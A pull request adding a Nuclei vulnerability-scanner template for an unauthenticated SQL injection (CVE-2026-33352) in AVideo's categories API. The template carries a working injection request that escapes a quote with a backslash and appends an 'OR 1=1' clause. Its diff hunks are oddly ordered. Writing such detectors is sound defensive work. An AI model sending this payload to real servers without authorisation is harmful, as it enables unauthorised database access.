### PR TITLE
Add CVE-2026-33352 template

### DIFF
--- a/http/cves/2026/CVE-2026-33352.yaml
+++ b/http/cves/2026/CVE-2026-33352.yaml
@@ -40,7 +40,7 @@ http:
       - type: status
         status:
           - 200
-      - type: word
+      - type: regex
         part: body
-        words:
-          - CVE33352_SAFE_MARKER
+        regex:
+          - '(?s)CVE33352_SAFE_MARKER.*CVE33352_SAFE_MARKER.*CVE33352_SAFE_MARKER'

--- a/http/cves/2026/CVE-2026-33352.yaml
+++ b/http/cves/2026/CVE-2026-33352.yaml
@@ -1,0 +1,46 @@
+id: CVE-2026-33352
+
+info:
+  name: AVideo < 29.0 - Unauthenticated SQL Injection in Categories API
+  author: str4k3r
+  severity: critical
+  description: |
+    AVideo versions before the fix in commit 206d38e concatenate values from
+    the unauthenticated `doNotShowCats[]` parameter into the categories query.
+    A backslash can escape the generated quote and turn the next value into a
+    SQL expression. The detector uses a constant-only marker expression in the
+    read-only categories endpoint; it does not extract or modify application
+    data.
+  impact: An unauthenticated remote attacker may inject SQL into the public categories endpoint.
+  remediation: Upgrade AVideo to a release containing commit 206d38e or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-33352
+    - https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj
+    - https://github.com/WWBN/AVideo/commit/206d38e97b8c854771bb2907b13f9f36e8bcf874
+    - https://github.com/WWBN/AVideo/releases/tag/29.0
+  classification:
+    cve-id: CVE-2026-33352
+    cwe-id: CWE-89
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    vendor: wwbn
+    product: avideo
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,avideo,sqli,cwe89,unauth
+
+http:
+  - raw:
+      - |
+        GET /objects/categories.json.php?doNotShowCats%5B0%5D=%5C&doNotShowCats%5B1%5D=%29%20OR%201%3D1%29%2D%2D%20-&doNotShowCats%5B2%5D=CVE33352_SAFE_MARKER HTTP/1.1
+        Host: {{Hostname}}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - CVE33352_SAFE_MARKER


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-33352 in AVideo. Affected releases concatenate `doNotShowCats[]` values into the public categories query; the fixed source validates the values before constructing SQL.

## Detection

The template uses the generic categories endpoint with a constant-only marker expression. It matches the marker in the response and performs no insert, update, delete, data extraction, command execution, or external callback.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-33352
- https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj
- https://github.com/WWBN/AVideo/commit/206d38e97b8c854771bb2907b13f9f36e8bcf874

## Validation

Previously recorded native Nuclei v3.11.0 differential: vulnerable source 25.0 detected 3/3; fixed source 29.0 not detected 3/3. The final template was syntax-validated and quality-checked before submission.